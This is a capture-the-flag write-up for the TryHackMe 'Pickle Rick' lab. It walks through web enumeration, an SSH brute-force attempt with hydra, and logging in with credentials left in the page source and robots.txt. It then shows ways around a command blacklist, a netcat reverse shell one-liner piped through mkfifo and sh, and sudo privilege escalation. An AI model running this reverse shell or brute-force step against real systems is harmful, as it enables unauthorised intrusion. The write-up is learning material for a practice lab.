TryHackMe: Pickle Rick CTF

Link: https://tryhackme.com/room/picklerick

Our first real CTF room! Our task is to exploit a web server to find 3 ingredients (flags).

Machine Compendium

This is where I will keep coming back to store new information so it’s in one place

{
	"MACHINE_IP": 10.10.152.149,
	"MACHINE_INFO": [
		"distribution": "Ubuntu Linux"
		"version": "16.04.5 LTS"
	],
	"Ports":[
		22: [service: "ssh", version: "OpenSSH 7.2p2", auth: "publickey"],
		80: "web server Apache httpd 2.4.18",
		4005: "pxc-pin"
	],
	"Credentials": [
		"R1ckRul3s": "Wubbalubbadubdub"
	]
	"Access Point" : [
		"Entry Point": "/login.php",
		"Command Panel": [
			"URL": "/portal.php",
			"User": "www-data",
			"cwd": "/var/www/html",
			"banned_cmds": ["cat", "head", "more", "tail", "nano", "vim", "vi"]
		]
	],
	"Other Info":[
		"robots.txt": "Wubbalubbadubdub",
		"portal_base64_string": "rabbit hole"
	]
	
}

Enumeration & Discovery

First we visit the website directly in our browser, the text indicates we need to login to his computer but he forgot his password.

I ned you to ... logon to my computer and find the last three secret ingredients to finish my pickle reverse potion. The only problem is, I have no idea what the ... pasword was!

First, I inspected the source code, and fortunately for us we have a username commented in the HTML:

<html lang="en">
	<head>...</head>
	<body>
		<div class="container">...</div>
			<!--Note to self, remember username! Username: R1ckRul3s-->
	</body>
</html>

Great! Already off to a good start. I assume we must have SSH running so let’s run an nmap scan to verify:

┌──(kali㉿kali)-[~/Downloads]
└─$ nmap --top-ports=1000 -T5 10.10.152.149 -A     
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-03-18 07:33 EDT
Warning: 10.10.152.149 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.152.149
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 89:bc:02:5f:3f:cc:ca:b7:2e:68:5c:57:65:d8:6d:cf (RSA)
|   256 e4:17:54:7e:0e:28:b3:7e:6a:a3:bc:bb:4c:6e:08:2a (ECDSA)
|_  256 0a:5b:3d:2f:01:03:5f:37:74:c3:76:cc:ec:99:d3:3e (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
4005/tcp filtered pxc-pin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds

Yep! We see we are open on port 22, so we can first try a common list of passwords to see if we can get in:

hydra -t 5 -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt -vV 10.10.152.149 ssh

Here is a breakdown of each part of the command:

  • hydra – the main command
  • -t 5 – 5 concurrent threads
  • -l R1ckRul3s – our login username
  • -P /usr/share/wordlists/rockyou.txt – our word list
  • -vV – verbose mode (print out each tested username/pass pair)
  • 10.10.152.149 – our target machine
  • ssh – our target service

However, upon executing, we can see this:

[INFO] Testing if password authentication is supported by ssh://R1ckRul3s@10.10.152.149:22
[ERROR] target ssh://10.10.152.149:22/ does not support password authentication (method reply 4).

So, unfortunately, looks like brute-forcing is out of the question. We are going to need to obtain access to the id_rsa public key file somehow.

Back to the source code of the website, we can see some JS, CSS and Images are stored in /assets. Perhaps there is something else here?

/assets directory
Just js, css and images

Nope, everything looks normal. For testing, I am going to download the images and ensure nothing is embedded in them. But they all look like normal images.

Now, let’s try gobuster and see if we can find any other directories hidden around.

We need to pass the website to the -u parameter, and I used a common wordlist for -w found in /usr/share/wordlists/dirb

┌──(kali㉿kali)-[~/Downloads]
└─$ gobuster dir -u 10.10.152.149 -w /usr/share/wordlists/dirb/common.txt

We did find a robots.txt with the string Wubbalubbadubdub, this does not seem to work for SSH, as it requires a publickey login.

I did some googling for tools to use on webservers and found out about nikto, I am going to run a nikto scan now as well to see if we get anything.

Our Nikto Scan reveals a login.php page

Nikto did return a login.php page! Let’s check that out.

Gaining Access

This login page just accepts a username and password. We know a username of R1ckRul3s and maybe the string in the robots.txt is the password?

Logged in and looking at the command panel

Yep, we are in! Let’s see what we have in here.

We have the Commands tab, but every other tab just says “Only the REAL rick can view this page..”.

In the source code of the command panel, there is a comment with an odd string:

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=

I tried decoding it as Base64 but it still doesnt appear to be much help.

Flag 1

Fortunately, we do have access to the machine with the command panel! I ran whoami and we are running as www-data. I also ran ls -la and I can see a Sup3rS3cretPickl3Ingred.txt file, but if we try to run the cat command, it just fails.

I did some Googling and found we can copy the file to /dev/stdout and it shows the contents! For this we get our first flag!

Flag 2

I also did this to the other text file in the directory to see if they contained any info:

  • clue.txt
    • Look around the file system for the other ingredient.

I ran some ls -la commands, we are in /var/www/html right now. so ls -ls ../../../ gets us to the root directory.

Our Command Panel with the command

ls -la ../../../home/rick

I had suspicions there may be more info in the home directory, and sure enough there is! Let’s cp this to /dev/stdout to read it.

Also, it turns out you can run find from the root directory to find this (provided we knew it had ingredient in it): find ../../../ | grep -e "ingred"

Flag 3 & Reverse Shell

So we have two flags. I went back to that strange Base64 encoded string and decoded it 6 more times and it becomes rabbit hole. That’s not the third flag so I’m not sure what use it is.

I modifed a reverse shell script and started up netcat so you can use this command for a reverse shell:

rm ../../tmp/f;mkfifo ../../tmp/f;cp ../../tmp/f /dev/stdout|../../../bin/sh -i 2>&1|nc your_ip_here 4444 >../../tmp/f

It’s a common bash script, but we can’t use cat so I had to change it to the cp to /dev/stdout and also put the ../../../ for the actual location of the things. But it works!

And now I can actually change directories and no commands are banned so maybe this will help us more.

Now if we cat the portal.php, we can see cat, head, more, tail, nano, vim and vi are banned, I will add this to our compendium. Nothing else seems interesting in these files

Let’s see if we can escalate privileges, or what commands we have access to by running sudo -l so we can view what’s in the /root folder.

sudo -l

User www-data may run the following commands:
(ALL) NOPASSWD: ALL

It looks like we can access everything with no password! Let’s see if we can check out /root with sudo ls -la /root. There is a 3rd.txt file here! Since we have our reverse shell, cat is not banned so we can use it to look at the file for our final flag

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *